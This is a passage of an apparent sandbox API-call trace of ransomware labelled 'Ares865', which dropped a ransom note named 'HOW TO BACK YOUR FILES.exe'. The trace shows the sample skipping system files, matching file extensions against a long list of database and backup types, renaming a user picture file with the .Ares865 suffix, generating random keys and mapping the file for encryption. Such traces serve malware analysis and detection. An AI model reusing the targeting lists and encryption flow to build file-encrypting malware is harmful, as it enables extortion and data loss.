(lpString="ade") returned 3 [0084.695] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0084.695] lstrlenW (lpString="adf") returned 3 [0084.695] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0084.695] lstrlenW (lpString="adn") returned 3 [0084.695] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0084.695] lstrlenW (lpString="adp") returned 3 [0084.695] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0084.695] lstrlenW (lpString="alf") returned 3 [0084.695] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0084.695] lstrlenW (lpString="ask") returned 3 [0084.695] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0084.695] lstrlenW (lpString="btr") returned 3 [0084.695] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0084.695] lstrlenW (lpString="cat") returned 3 [0084.695] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0084.695] lstrlenW (lpString="cdb") returned 3 [0084.695] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0084.695] lstrlenW (lpString="ckp") returned 3 [0084.695] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0084.695] lstrlenW (lpString="cma") returned 3 [0084.695] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0084.695] lstrlenW (lpString="cpd") returned 3 [0084.695] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0084.695] lstrlenW (lpString="dacpac") returned 6 [0084.695] lstrcmpiW (lpString1="13.bmp", lpString2="dacpac") returned -1 [0084.695] lstrlenW (lpString="dad") returned 3 [0084.695] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0084.695] lstrlenW (lpString="dadiagrams") returned 10 [0084.695] lstrcmpiW (lpString1="tile13.bmp", lpString2="dadiagrams") returned 1 [0084.695] lstrlenW (lpString="daschema") returned 8 [0084.695] lstrcmpiW (lpString1="le13.bmp", lpString2="daschema") returned 1 [0084.695] lstrlenW (lpString="db-journal") returned 10 [0084.695] lstrcmpiW (lpString1="tile13.bmp", lpString2="db-journal") returned 1 [0084.696] lstrlenW (lpString="db-shm") returned 6 [0084.696] lstrcmpiW (lpString1="13.bmp", lpString2="db-shm") returned -1 [0084.696] lstrlenW (lpString="db-wal") returned 6 [0084.696] lstrcmpiW (lpString1="13.bmp", lpString2="db-wal") returned -1 [0084.696] lstrlenW (lpString="dbc") returned 3 [0084.696] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0084.696] lstrlenW (lpString="dbs") returned 3 [0084.696] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0084.696] lstrlenW (lpString="dbt") returned 3 [0084.696] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0084.696] lstrlenW (lpString="dbv") returned 3 [0084.696] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0084.696] lstrlenW (lpString="dbx") returned 3 [0084.696] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0084.696] lstrlenW (lpString="dcb") returned 3 [0084.696] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0084.696] lstrlenW (lpString="dct") returned 3 [0084.696] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0084.696] lstrlenW (lpString="dcx") returned 3 [0084.696] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0084.696] lstrlenW (lpString="ddl") returned 3 [0084.696] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0084.696] lstrlenW (lpString="dlis") returned 4 [0084.696] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0084.696] lstrlenW (lpString="dp1") returned 3 [0084.696] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0084.696] lstrlenW (lpString="dqy") returned 3 [0084.696] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0084.696] lstrlenW (lpString="dsk") returned 3 [0084.696] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0084.696] lstrlenW (lpString="dsn") returned 3 [0084.696] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0084.696] lstrlenW (lpString="dtsx") returned 4 [0084.696] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0084.696] lstrlenW (lpString="dxl") returned 3 [0084.696] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 [0084.696] lstrlenW (lpString="eco") returned 3 [0084.696] lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0084.697] lstrlenW (lpString="ecx") returned 3 [0084.697] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0084.697] lstrlenW (lpString="edb") returned 3 [0084.697] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0084.697] lstrlenW (lpString="epim") returned 4 [0084.697] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0084.697] lstrlenW (lpString="fcd") returned 3 [0084.697] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0084.697] lstrlenW (lpString="fdb") returned 3 [0084.697] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0084.697] lstrlenW (lpString="fic") returned 3 [0084.697] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0084.697] lstrlenW (lpString="flexolibrary") returned 12 [0084.697] lstrcmpiW (lpString1="ertile13.bmp", lpString2="flexolibrary") returned -1 [0084.697] lstrlenW (lpString="fm5") returned 3 [0084.697] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0084.697] lstrlenW (lpString="fmp") returned 3 [0084.697] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0084.697] lstrlenW (lpString="fmp12") returned 5 [0084.697] lstrcmpiW (lpString1="3.bmp", lpString2="fmp12") returned -1 [0084.697] lstrlenW (lpString="fmpsl") returned 5 [0084.697] lstrcmpiW (lpString1="3.bmp", lpString2="fmpsl") returned -1 [0084.697] lstrlenW (lpString="fol") returned 3 [0084.697] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0084.697] lstrlenW (lpString="fp3") returned 3 [0084.697] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0084.697] lstrlenW (lpString="fp4") returned 3 [0084.697] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0084.697] lstrlenW (lpString="fp5") returned 3 [0084.697] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0084.697] lstrlenW (lpString="fp7") returned 3 [0084.697] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0084.697] lstrlenW (lpString="fpt") returned 3 [0084.697] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0084.697] lstrlenW (lpString="frm") returned 3 [0084.697] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0084.697] lstrlenW (lpString="gdb") returned 3 [0084.697] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.698] lstrlenW (lpString="gdb") returned 3 [0084.698] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.698] lstrlenW (lpString="grdb") returned 4 [0084.698] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0084.698] lstrlenW (lpString="gwi") returned 3 [0084.698] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0084.698] lstrlenW (lpString="hdb") returned 3 [0084.698] lstrcmpiW (lpString1="bmp", lpString2="hdb") returned -1 [0084.698] lstrlenW (lpString="his") returned 3 [0084.698] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0084.698] lstrlenW (lpString="ib") returned 2 [0084.698] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0084.698] lstrlenW (lpString="idb") returned 3 [0084.698] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0084.698] lstrlenW (lpString="ihx") returned 3 [0084.698] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0084.698] lstrlenW (lpString="itdb") returned 4 [0084.698] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0084.698] lstrlenW (lpString="itw") returned 3 [0084.698] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0084.698] lstrlenW (lpString="jet") returned 3 [0084.698] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0084.698] lstrlenW (lpString="jtx") returned 3 [0084.698] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0084.698] lstrlenW (lpString="kdb") returned 3 [0084.698] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0084.698] lstrlenW (lpString="kexi") returned 4 [0084.698] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0084.698] lstrlenW (lpString="kexic") returned 5 [0084.698] lstrcmpiW (lpString1="3.bmp", lpString2="kexic") returned -1 [0084.698] lstrlenW (lpString="kexis") returned 5 [0084.698] lstrcmpiW (lpString1="3.bmp", lpString2="kexis") returned -1 [0084.698] lstrlenW (lpString="lgc") returned 3 [0084.698] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0084.698] lstrlenW (lpString="lwx") returned 3 [0084.698] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0084.698] lstrlenW (lpString="maf") returned 3 [0084.698] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0084.699] lstrlenW (lpString="maq") returned 3 [0084.699] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0084.699] lstrlenW (lpString="mar") returned 3 [0084.699] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0084.699] lstrlenW (lpString="marshal") returned 7 [0084.699] lstrcmpiW (lpString1="e13.bmp", lpString2="marshal") returned -1 [0084.699] lstrlenW (lpString="mas") returned 3 [0084.699] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0084.699] lstrlenW (lpString="mav") returned 3 [0084.699] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0084.699] lstrlenW (lpString="maw") returned 3 [0084.699] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0084.699] lstrlenW (lpString="mdbhtml") returned 7 [0084.699] lstrcmpiW (lpString1="e13.bmp", lpString2="mdbhtml") returned -1 [0084.699] lstrlenW (lpString="mdn") returned 3 [0084.699] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0084.699] lstrlenW (lpString="mdt") returned 3 [0084.699] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0084.699] lstrlenW (lpString="mfd") returned 3 [0084.699] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0084.699] lstrlenW (lpString="mpd") returned 3 [0084.699] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0084.699] lstrlenW (lpString="mrg") returned 3 [0084.699] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0084.699] lstrlenW (lpString="mud") returned 3 [0084.699] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0084.699] lstrlenW (lpString="mwb") returned 3 [0084.699] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0084.699] lstrlenW (lpString="myd") returned 3 [0084.699] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0084.699] lstrlenW (lpString="ndf") returned 3 [0084.699] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0084.699] lstrlenW (lpString="nnt") returned 3 [0084.699] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0084.699] lstrlenW (lpString="nrmlib") returned 6 [0084.699] lstrcmpiW (lpString1="13.bmp", lpString2="nrmlib") returned -1 [0084.699] lstrlenW (lpString="ns2") returned 3 [0084.700] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0084.700] lstrlenW (lpString="ns3") returned 3 [0084.700] lstrcmpiW (lpString1="bmp", lpString2="ns3") returned -1 [0084.700] lstrlenW (lpString="ns4") returned 3 [0084.700] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0084.700] lstrlenW (lpString="nsf") returned 3 [0084.700] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0084.700] lstrlenW (lpString="nv") returned 2 [0084.700] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0084.700] lstrlenW (lpString="nv2") returned 3 [0084.700] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0084.700] lstrlenW (lpString="nwdb") returned 4 [0084.700] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0084.700] lstrlenW (lpString="nyf") returned 3 [0084.700] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0084.700] lstrlenW (lpString="odb") returned 3 [0084.700] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.700] lstrlenW (lpString="odb") returned 3 [0084.700] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.700] lstrlenW (lpString="oqy") returned 3 [0084.700] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0084.700] lstrlenW (lpString="ora") returned 3 [0084.700] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0084.700] lstrlenW (lpString="orx") returned 3 [0084.700] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0084.700] lstrlenW (lpString="owc") returned 3 [0084.700] lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0084.700] lstrlenW (lpString="p96") returned 3 [0084.700] lstrcmpiW (lpString1="bmp", lpString2="p96") returned -1 [0084.700] lstrlenW (lpString="p97") returned 3 [0084.700] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0084.700] lstrlenW (lpString="pan") returned 3 [0084.700] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0084.700] lstrlenW (lpString="pdb") returned 3 [0084.700] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0084.700] lstrlenW (lpString="pdm") returned 3 [0084.700] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0084.700] lstrlenW (lpString="pnz") returned 3 [0084.701] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0084.701] lstrlenW (lpString="qry") returned 3 [0084.701] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0084.701] lstrlenW (lpString="qvd") returned 3 [0084.701] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0084.701] lstrlenW (lpString="rbf") returned 3 [0084.701] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0084.701] lstrlenW (lpString="rctd") returned 4 [0084.701] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0084.701] lstrlenW (lpString="rod") returned 3 [0084.701] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0084.701] lstrlenW (lpString="rodx") returned 4 [0084.701] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0084.701] lstrlenW (lpString="rpd") returned 3 [0084.701] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0084.701] lstrlenW (lpString="rsd") returned 3 [0084.701] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0084.701] lstrlenW (lpString="sas7bdat") returned 8 [0084.701] lstrcmpiW (lpString1="le13.bmp", lpString2="sas7bdat") returned -1 [0084.701] lstrlenW (lpString="sbf") returned 3 [0084.701] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0084.701] lstrlenW (lpString="scx") returned 3 [0084.701] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0084.701] lstrlenW (lpString="sdb") returned 3 [0084.701] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0084.701] lstrlenW (lpString="sdc") returned 3 [0084.701] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0084.701] lstrlenW (lpString="sdf") returned 3 [0084.701] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0084.701] lstrlenW (lpString="sis") returned 3 [0084.701] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0084.701] lstrlenW (lpString="spq") returned 3 [0084.701] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0084.701] lstrlenW (lpString="te") returned 2 [0084.701] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 [0084.701] lstrlenW (lpString="teacher") returned 7 [0084.701] lstrcmpiW (lpString1="e13.bmp", lpString2="teacher") returned -1 [0084.701] lstrlenW (lpString="tmd") returned 3 [0084.702] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0084.702] lstrlenW (lpString="tps") returned 3 [0084.702] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0084.702] lstrlenW (lpString="trc") returned 3 [0084.702] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.702] lstrlenW (lpString="trc") returned 3 [0084.702] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.702] lstrlenW (lpString="trm") returned 3 [0084.702] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0084.702] lstrlenW (lpString="udb") returned 3 [0084.702] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0084.702] lstrlenW (lpString="udl") returned 3 [0084.702] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0084.702] lstrlenW (lpString="usr") returned 3 [0084.702] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0084.702] lstrlenW (lpString="v12") returned 3 [0084.702] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0084.702] lstrlenW (lpString="vis") returned 3 [0084.702] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0084.702] lstrlenW (lpString="vpd") returned 3 [0084.702] lstrcmpiW (lpString1="bmp", lpString2="vpd") returned -1 [0084.702] lstrlenW (lpString="vvv") returned 3 [0084.702] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0084.702] lstrlenW (lpString="wdb") returned 3 [0084.702] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0084.702] lstrlenW (lpString="wmdb") returned 4 [0084.702] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0084.702] lstrlenW (lpString="wrk") returned 3 [0084.702] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0084.702] lstrlenW (lpString="xdb") returned 3 [0084.702] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0084.702] lstrlenW (lpString="xld") returned 3 [0084.702] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0084.702] lstrlenW (lpString="xmlff") returned 5 [0084.702] lstrcmpiW (lpString1="3.bmp", lpString2="xmlff") returned -1 [0084.702] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp.Ares865") returned 90 [0084.703] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile13.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile13.bmp.ares865"), dwFlags=0x1) returned 1 [0084.703] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile13.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0084.704] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=48824) returned 1 [0084.704] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0084.704] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0084.704] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0084.704] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0084.705] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0084.705] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.705] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc1c0, lpName=0x0) returned 0x15c [0084.707] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc1c0) returned 0x190000 [0084.713] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0084.714] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0084.714] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.714] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0084.714] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0084.714] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0084.714] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0084.714] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0084.714] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0084.714] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0084.715] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0084.715] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0084.715] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0084.715] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0084.715] CloseHandle (hObject=0x15c) returned 1 [0084.715] CloseHandle (hObject=0x118) returned 1 [0084.715] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0084.715] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0084.715] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0084.716] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae2e79e8, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae2e79e8, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdb82a065, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile14.bmp", cAlternateFileName="")) returned 1 [0084.716] lstrcmpiW (lpString1="usertile14.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0084.716] lstrcmpiW (lpString1="usertile14.bmp", lpString2="aoldtz.exe") returned 1 [0084.716] lstrcmpiW (lpString1="usertile14.bmp", lpString2=".") returned 1 [0084.716] lstrcmpiW (lpString1="usertile14.bmp", lpString2="..") returned 1 [0084.716] lstrcmpiW (lpString1="usertile14.bmp", lpString2="windows") returned -1 [0084.716] lstrcmpiW (lpString1="usertile14.bmp", lpString2="bootmgr") returned 1 [0084.716] lstrcmpiW (lpString1="usertile14.bmp", lpString2="temp") returned 1 [0084.716] lstrcmpiW (lpString1="usertile14.bmp", lpString2="pagefile.sys") returned 1 [0084.716] lstrcmpiW (lpString1="usertile14.bmp", lpString2="boot") returned 1 [0084.716] lstrcmpiW (lpString1="usertile14.bmp", lpString2="ids.txt") returned 1 [0084.716] lstrcmpiW (lpString1="usertile14.bmp", lpString2="ntuser.dat") returned 1 [0084.716] lstrcmpiW (lpString1="usertile14.bmp", lpString2="perflogs") returned 1 [0084.716] lstrcmpiW (lpString1="usertile14.bmp", lpString2="MSBuild") returned 1 [0084.716] lstrlenW (lpString="usertile14.bmp") returned 14 [0084.716] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp") returned 82 [0084.716] lstrcpyW (in: lpString1=0x2cce488, lpString2="usertile14.bmp" | out: lpString1="usertile14.bmp") returned="usertile14.bmp" [0084.716] lstrlenW (lpString="usertile14.bmp") returned 14 [0084.716] lstrlenW (lpString="Ares865") returned 7 [0084.716] lstrcmpiW (lpString1="e14.bmp", lpString2="Ares865") returned 1 [0084.716] lstrlenW (lpString=".dll") returned 4 [0084.716] lstrcmpiW (lpString1="usertile14.bmp", lpString2=".dll") returned 1 [0084.716] lstrlenW (lpString=".lnk") returned 4 [0084.716] lstrcmpiW (lpString1="usertile14.bmp", lpString2=".lnk") returned 1 [0084.716] lstrlenW (lpString=".ini") returned 4 [0084.717] lstrcmpiW (lpString1="usertile14.bmp", lpString2=".ini") returned 1 [0084.717] lstrlenW (lpString=".sys") returned 4 [0084.717] lstrcmpiW (lpString1="usertile14.bmp", lpString2=".sys") returned 1 [0084.717] lstrlenW (lpString="usertile14.bmp") returned 14 [0084.717] lstrlenW (lpString="bak") returned 3 [0084.717] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0084.717] lstrlenW (lpString="ba_") returned 3 [0084.717] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0084.717] lstrlenW (lpString="dbb") returned 3 [0084.717] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0084.717] lstrlenW (lpString="vmdk") returned 4 [0084.717] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0084.717] lstrlenW (lpString="rar") returned 3 [0084.717] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0084.717] lstrlenW (lpString="zip") returned 3 [0084.717] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0084.717] lstrlenW (lpString="tgz") returned 3 [0084.717] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0084.717] lstrlenW (lpString="vbox") returned 4 [0084.717] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0084.717] lstrlenW (lpString="vdi") returned 3 [0084.717] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0084.717] lstrlenW (lpString="vhd") returned 3 [0084.717] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0084.717] lstrlenW (lpString="vhdx") returned 4 [0084.717] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0084.717] lstrlenW (lpString="avhd") returned 4 [0084.717] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0084.717] lstrlenW (lpString="db") returned 2 [0084.717] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0084.717] lstrlenW (lpString="db2") returned 3 [0084.717] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0084.717] lstrlenW (lpString="db3") returned 3 [0084.717] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0084.717] lstrlenW (lpString="dbf") returned 3 [0084.717] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0084.718] lstrlenW (lpString="mdf") returned 3 [0084.718] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0084.718] lstrlenW (lpString="mdb") returned 3 [0084.718] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0084.718] lstrlenW (lpString="sql") returned 3 [0084.718] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0084.718] lstrlenW (lpString="sqlite") returned 6 [0084.718] lstrcmpiW (lpString1="14.bmp", lpString2="sqlite") returned -1 [0084.718] lstrlenW (lpString="sqlite3") returned 7 [0084.718] lstrcmpiW (lpString1="e14.bmp", lpString2="sqlite3") returned -1 [0084.718] lstrlenW (lpString="sqlitedb") returned 8 [0084.718] lstrcmpiW (lpString1="le14.bmp", lpString2="sqlitedb") returned -1 [0084.718] lstrlenW (lpString="xml") returned 3 [0084.718] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0084.718] lstrlenW (lpString="$er") returned 3 [0084.718] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0084.718] lstrlenW (lpString="4dd") returned 3 [0084.718] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0084.718] lstrlenW (lpString="4dl") returned 3 [0084.718] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0084.718] lstrlenW (lpString="^^^") returned 3 [0084.718] 